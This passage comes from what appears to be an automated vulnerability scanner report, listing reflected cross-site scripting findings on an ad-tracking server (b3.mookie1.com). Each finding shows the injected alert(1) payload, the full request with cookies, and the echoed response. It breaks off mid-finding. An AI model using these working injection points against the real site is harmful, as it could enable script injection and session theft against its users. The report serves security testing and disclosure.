GET /2/TRACK_Xaxis/1138219538@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/contact&_RM_HTML_title_=Contact%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/contact&Section=Contact&84aac'-alert(1)-'f6bd1f4c180=1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/contact
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206258

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:25:22 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2035
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/contact&_RM_HTML_title_=Contact%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/contact&Section=Contact&84aac'-alert(1)-'f6bd1f4c180=1';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection='';
var page=
...[SNIP]...

1.184. http://b3.mookie1.com/2/TRACK_Xaxis/1287345012@x54 [&_RM_HTML_url_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1287345012@x54

Issue detail

The value of the &_RM_HTML_url_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46009'-alert(1)-'822e3ab837b was submitted in the &_RM_HTML_url_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1287345012@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/contact46009'-alert(1)-'822e3ab837b&_RM_HTML_title_=Contact%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/work&Section=Contact HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/contact
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206258

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:25:03 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2026
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
rnal preload the image request and does not contain 247SEO argument = "N" */
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/contact46009'-alert(1)-'822e3ab837b&_RM_HTML_title_=Contact%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/work&Section=Contact';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?mig
...[SNIP]...

1.185. http://b3.mookie1.com/2/TRACK_Xaxis/1287345012@x54 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1287345012@x54

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dddc5"><script>alert(1)</script>91d81038683 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Xaxisdddc5"><script>alert(1)</script>91d81038683/1287345012@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/contact&_RM_HTML_title_=Contact%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/work&Section=Contact HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/contact
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206258

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:25:21 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 331
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Xaxisdddc5"><script>alert(1)</script>91d81038683/1467176220/x54/default/empty.gif/726348573830334f56626741436d4566?x" target="_top"><IMG
...[SNIP]...

1.186. http://b3.mookie1.com/2/TRACK_Xaxis/1287345012@x54 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1287345012@x54

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 109e4"><script>alert(1)</script>3580b23baea was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Xaxis/1287345012@x54109e4"><script>alert(1)</script>3580b23baea?&_RM_HTML_url_=http%3A//www.xaxis.com/contact&_RM_HTML_title_=Contact%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/work&Section=Contact HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/contact
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206258

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:25:23 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 322
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Xaxis/246370945/x54109e4"><script>alert(1)</script>3580b23baea/default/empty.gif/726348573830334f56626741436d4566?x" target="_top"><IMG
...[SNIP]...

1.187. http://b3.mookie1.com/2/TRACK_Xaxis/1287345012@x54 [Section parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1287345012@x54

Issue detail

The value of the Section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83ac8'-alert(1)-'ce978602c8 was submitted in the Section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1287345012@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/contact&_RM_HTML_title_=Contact%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/work&Section=Contact83ac8'-alert(1)-'ce978602c8 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/contact
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206258

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:25:15 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2025
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
ge();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/contact&_RM_HTML_title_=Contact%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/work&Section=Contact83ac8'-alert(1)-'ce978602c8';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection='';
var page=''
...[SNIP]...

1.188. http://b3.mookie1.com/2/TRACK_Xaxis/1287345012@x54 [_RM_HTML_referer_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1287345012@x54

Issue detail

The value of the _RM_HTML_referer_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7e05'-alert(1)-'e49792042cb was submitted in the _RM_HTML_referer_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1287345012@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/contact&_RM_HTML_title_=Contact%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/workd7e05'-alert(1)-'e49792042cb&Section=Contact HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/contact
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206258

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:25:11 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2026
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
mageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/contact&_RM_HTML_title_=Contact%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/workd7e05'-alert(1)-'e49792042cb&Section=Contact';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection=
...[SNIP]...

1.189. http://b3.mookie1.com/2/TRACK_Xaxis/1287345012@x54 [_RM_HTML_title_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1287345012@x54

Issue detail

The value of the _RM_HTML_title_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71060'-alert(1)-'712ff9b2854 was submitted in the _RM_HTML_title_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1287345012@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/contact&_RM_HTML_title_=Contact%20-%20Xaxis71060'-alert(1)-'712ff9b2854&_RM_HTML_referer_=http%3A//www.xaxis.com/work&Section=Contact HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/contact
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206258

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:25:07 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2082
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
oes not contain 247SEO argument = "N" */
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/contact&_RM_HTML_title_=Contact%20-%20Xaxis71060'-alert(1)-'712ff9b2854&_RM_HTML_referer_=http%3A//www.xaxis.com/work&Section=Contact';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxi
...[SNIP]...

1.190. http://b3.mookie1.com/2/TRACK_Xaxis/1287345012@x54 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1287345012@x54

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69ab5'-alert(1)-'a7b748156b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1287345012@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/contact&_RM_HTML_title_=Contact%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/work&Section=Contact&69ab5'-alert(1)-'a7b748156b5=1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/contact
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206258

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:25:19 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2029
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
e();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/contact&_RM_HTML_title_=Contact%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/work&Section=Contact&69ab5'-alert(1)-'a7b748156b5=1';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection='';
var page=
...[SNIP]...

1.191. http://b3.mookie1.com/2/TRACK_Xaxis/1295399308@x54 [&_RM_HTML_url_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1295399308@x54

Issue detail

The value of the &_RM_HTML_url_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a911'-alert(1)-'3be89f1d937 was submitted in the &_RM_HTML_url_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1295399308@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers3a911'-alert(1)-'3be89f1d937&_RM_HTML_title_=Careers%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/work&Section=Careers HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/careers
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206270

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:26:38 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2032
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
l preload the image request and does not contain 247SEO argument = "N" */
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers3a911'-alert(1)-'3be89f1d937&_RM_HTML_title_=Careers%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/work&Section=Careers';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?
...[SNIP]...

1.192. http://b3.mookie1.com/2/TRACK_Xaxis/1295399308@x54 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1295399308@x54

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 776cd"><script>alert(1)</script>b491570cc00 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Xaxis776cd"><script>alert(1)</script>b491570cc00/1295399308@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers&_RM_HTML_title_=Careers%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/work&Section=Careers HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/careers
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206270

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:26:56 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 331
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Xaxis776cd"><script>alert(1)</script>b491570cc00/1104678151/x54/default/empty.gif/726348573830334f56626741436d4566?x" target="_top"><IMG
...[SNIP]...

1.193. http://b3.mookie1.com/2/TRACK_Xaxis/1295399308@x54 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1295399308@x54

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f058"><script>alert(1)</script>b51d3fd442a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Xaxis/1295399308@x547f058"><script>alert(1)</script>b51d3fd442a?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers&_RM_HTML_title_=Careers%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/work&Section=Careers HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/careers
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206270

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:26:58 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 323
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Xaxis/1930434625/x547f058"><script>alert(1)</script>b51d3fd442a/default/empty.gif/726348573830334f56626741436d4566?x" target="_top"><IMG
...[SNIP]...

1.194. http://b3.mookie1.com/2/TRACK_Xaxis/1295399308@x54 [Section parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1295399308@x54

Issue detail

The value of the Section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b03d'-alert(1)-'3875fbe2ded was submitted in the Section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1295399308@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers&_RM_HTML_title_=Careers%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/work&Section=Careers5b03d'-alert(1)-'3875fbe2ded HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/careers
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206270

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:26:50 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2032
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...

imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/careers&_RM_HTML_title_=Careers%20-%20Xaxis&_RM_HTML_referer_=http%3A//www.xaxis.com/uk/work&Section=Careers5b03d'-alert(1)-'3875fbe2ded';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection='';
var page=''
...[SNIP]...

1.195. http://b3.mookie1.com/2/TRACK_Xaxis/1295399308@x54 [_RM_HTML_referer_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
